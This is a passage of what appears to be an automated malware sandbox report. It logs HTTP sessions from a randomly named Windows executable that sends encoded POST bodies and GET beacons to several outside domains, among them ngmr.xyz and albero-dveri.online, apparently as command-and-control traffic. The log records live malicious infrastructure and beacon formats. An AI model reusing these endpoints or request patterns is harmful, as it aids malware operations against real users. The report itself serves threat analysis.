                                                                                                                                              Data Ascii: iMm9IT4KLIaPbE7aU5OzoxqB54vu/nSr6M8DObMXQoImnaZ/50MQgusd7w1cJUcE5ieOvhbeFS1FHAdUY4cGV5K5X8Iz2r0ZyZNEx/2BV3pNKSgZpnlqqVY2ZttHqIXiPHcDbQmdy4WpHfysFraQGtyy5NdMulyMOTrXmG+OybZgnPxk5SXeqfvb1Bx+uoCqGxE/lHcvw7Pbg8CM6OSVWfscA/6vkfDzR035+2ImhOzbd/Q29T1


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                              13 | 192.168.11.20 | 49743 | 84.32.84.32 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                              Oct 4, 2024 08:07:53.860101938 CEST | 550 | OUT | GET /7k8f/?oz=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dfmagazine.shop
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:07:53.960364103 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                              Server: hcdn
                                                                                                                                              Date: Fri, 04 Oct 2024 06:07:53 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 10072
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              x-hcdn-request-id: 04f112d035d143747d32d4acfc7a398b-bos-edge2
                                                                                                                                              Expires: Fri, 04 Oct 2024 06:07:52 GMT
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;
                                                                                                                                              Oct 4, 2024 08:07:53.960510969 CEST1289INData Raw: 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66
                                                                                                                                              Data Ascii: margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:6
                                                                                                                                              Oct 4, 2024 08:07:53.960628033 CEST1289INData Raw: 33 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74
                                                                                                                                              Data Ascii: 3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;li
                                                                                                                                              Oct 4, 2024 08:07:53.960762024 CEST1289INData Raw: 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78
                                                                                                                                              Data Ascii: ize:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width
                                                                                                                                              Oct 4, 2024 08:07:53.960921049 CEST1289INData Raw: 72 69 61 6c 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c
                                                                                                                                              Data Ascii: rials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www
                                                                                                                                              Oct 4, 2024 08:07:53.960980892 CEST1289INData Raw: 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72
                                                                                                                                              Data Ascii: hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add w
                                                                                                                                              Oct 4, 2024 08:07:53.960994005 CEST1289INData Raw: 5b 5d 2c 6e 3d 30 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28
                                                                                                                                              Data Ascii: [],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join(""
                                                                                                                                              Oct 4, 2024 08:07:53.961090088 CEST1289INData Raw: 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66
                                                                                                                                              Data Ascii: ice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf1
                                                                                                                                              Oct 4, 2024 08:07:53.961100101 CEST100INData Raw: 2c 61 63 63 6f 75 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28
                                                                                                                                              Data Ascii: ,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.11.20 | 49744 | 54.67.87.110 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:07:59.389911890 CEST | 795 | OUT | POST /txr6/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.ngmr.xyz
                                                                                                                                              Origin: http://www.ngmr.xyz
                                                                                                                                              Referer: http://www.ngmr.xyz/txr6/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=qRo7UWlGE2pUjX1GvRfcsDJjcuyOmHkIDr9TBB+ETZ0+INBdx/5maRbfm/TtzrI9Ie/VLkBRAXnQ5DxKjBnB2Tg+qWc24zm8iKBqUXZzBQMBtbZ6fV8c24uQ0n3zfauNJhp9z/Em4Wmw7owstNwyQxtEL9Pq2xz5Vs4+IU1nq4H44++y/Xp9dq16KZUivNrUpQ==
Oct 4, 2024 08:07:59.544698954 CEST | 550 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                              Content-Length: 282
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Fri, 04 Oct 2024 06:30:47 GMT
                                                                                                                                              X-Varnish: 1110522503
                                                                                                                                              Age: 0
                                                                                                                                              Via: 1.1 varnish
                                                                                                                                              Connection: close
                                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                                              Server: C2M Server v1.02
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.11.20 | 49745 | 54.67.87.110 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:08:02.070502996 CEST | 815 | OUT | POST /txr6/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.ngmr.xyz
                                                                                                                                              Origin: http://www.ngmr.xyz
                                                                                                                                              Referer: http://www.ngmr.xyz/txr6/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrQ+Itxdw6ZmZRbf0fTo3rI6IezrLhhRAUbQ5BpKjWzOnTg4zmc48zm8iKBqUX9ZBUgBsqJ6OE8boouf3n3zbauzJhoez6gc4Uuw7ogstcwxaxtCP9OGxhmuNu4jYnJ3tr/z0IvoildZe5pIOptKtPqP0ePRQOUI4WwFoMCu5GTxOaM=
Oct 4, 2024 08:08:02.224946022 CEST | 550 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                              Content-Length: 282
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Fri, 04 Oct 2024 06:30:50 GMT
                                                                                                                                              X-Varnish: 1110522538
                                                                                                                                              Age: 0
                                                                                                                                              Via: 1.1 varnish
                                                                                                                                              Connection: close
                                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                                              Server: C2M Server v1.02
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.11.20 | 49746 | 54.67.87.110 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:08:04.757848978 CEST | 1289 | OUT | POST /txr6/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.ngmr.xyz
                                                                                                                                              Origin: http://www.ngmr.xyz
                                                                                                                                              Referer: http://www.ngmr.xyz/txr6/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:08:04.912288904 CEST | 550 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                              Content-Length: 282
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Fri, 04 Oct 2024 06:30:53 GMT
                                                                                                                                              X-Varnish: 1110522577
                                                                                                                                              Age: 0
                                                                                                                                              Via: 1.1 varnish
                                                                                                                                              Connection: close
                                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                                              Server: C2M Server v1.02
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.11.20 | 49747 | 54.67.87.110 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:08:07.449577093 CEST | 543 | OUT | GET /txr6/?oz=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.ngmr.xyz
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:08:07.603869915 CEST | 550 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                              Content-Length: 282
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Fri, 04 Oct 2024 06:30:55 GMT
                                                                                                                                              X-Varnish: 1110522614
                                                                                                                                              Age: 0
                                                                                                                                              Via: 1.1 varnish
                                                                                                                                              Connection: close
                                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                                              Server: C2M Server v1.02
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                              18 | 192.168.11.20 | 49748 | 194.58.112.174 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                              Oct 4, 2024 08:08:13.202764988 CEST | 828 | OUT | POST /7cy1/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.albero-dveri.online
                                                                                                                                              Origin: http://www.albero-dveri.online
                                                                                                                                              Referer: http://www.albero-dveri.online/7cy1/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=AsGHKhpyYI3IW7wEhbPfjdX2HNEz12nn7LIbMZwB8oZPIcCSZntLxRUuEuzS2VruDxGlXeS28D+7BhrBQO/evvzeZx0MK5/czCQatURK/PKU+OelmKbXaPTmBF6J9nc53R1ksDII8+pQutz2hpiv1GOFX4YHvJ7IOZff8mdBMF6TdyqGKHstgoTLT24fPCynjw==
                                                                                                                                              Oct 4, 2024 08:08:13.451306105 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:13 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Encoding: gzip


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                              19 | 192.168.11.20 | 49749 | 194.58.112.174 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                              Oct 4, 2024 08:08:16.056535006 CEST | 848 | OUT | POST /7cy1/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.albero-dveri.online
                                                                                                                                              Origin: http://www.albero-dveri.online
                                                                                                                                              Referer: http://www.albero-dveri.online/7cy1/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=AsGHKhpyYI3IEKAEi8jf2NX1MtEz8Wnd7LEbMY0R8a9PI9ySeVFLyRUuPOyayVrhDxLGXfu28Dq7BgbBT9nfu/zcRR0OUJ/czCQatUEt/JiU+/ulpOPUEfThCF6JqXc93R18sD4m88BQusD2h9OsvWOfYYZNh6SvJoz31kpqNlCmck7cX1YJj7P5XGB3NAz8+wfN2Gzi9yIwiWb0qW1WAbI=
                                                                                                                                              Oct 4, 2024 08:08:16.370129108 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:16 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Encoding: gzip


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                              20 | 192.168.11.20 | 49750 | 194.58.112.174 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                              Oct 4, 2024 08:08:18.820250988 CEST | 2578 | OUT | POST /7cy1/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.albero-dveri.online
                                                                                                                                              Origin: http://www.albero-dveri.online
                                                                                                                                              Referer: http://www.albero-dveri.online/7cy1/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:08:19.055752993 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:18 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Encoding: gzip


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                              21 | 192.168.11.20 | 49751 | 194.58.112.174 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                              Oct 4, 2024 08:08:21.573641062 CEST | 554 | OUT | GET /7cy1/?oz=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.albero-dveri.online
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:08:21.799434900 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:21 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                              22 | 192.168.11.20 | 49752 | 38.47.207.146 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                              Oct 4, 2024 08:08:27.220604897 CEST | 798 | OUT | POST /qjs8/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.typ67.top
                                                                                                                                              Origin: http://www.typ67.top
                                                                                                                                              Referer: http://www.typ67.top/qjs8/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=ThgGZIXTrmN3z/qL3z03lAT3T0wVP9oAOMeAcbHNzh9E5q528vBxAutzKt68t0SqCCPf4BqZlr1dRT4+PCA6YZg14nYtfrxQAxCQrDMYoyNZG8Yif6KP0/ZF1c5ybvRCDVUuoC95WYgxdv1nJOAU8PZ1kvMxvZHdUwXzqaKxs8SOB22PZz2SXDADpF8KQ3HNZA==
                                                                                                                                              Oct 4, 2024 08:08:27.522332907 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:27 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 138
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66b1b463-8a"
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                              23 | 192.168.11.20 | 49753 | 38.47.207.146 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                              Oct 4, 2024 08:08:30.061762094 CEST | 818 | OUT | POST /qjs8/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.typ67.top
                                                                                                                                              Origin: http://www.typ67.top
                                                                                                                                              Referer: http://www.typ67.top/qjs8/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
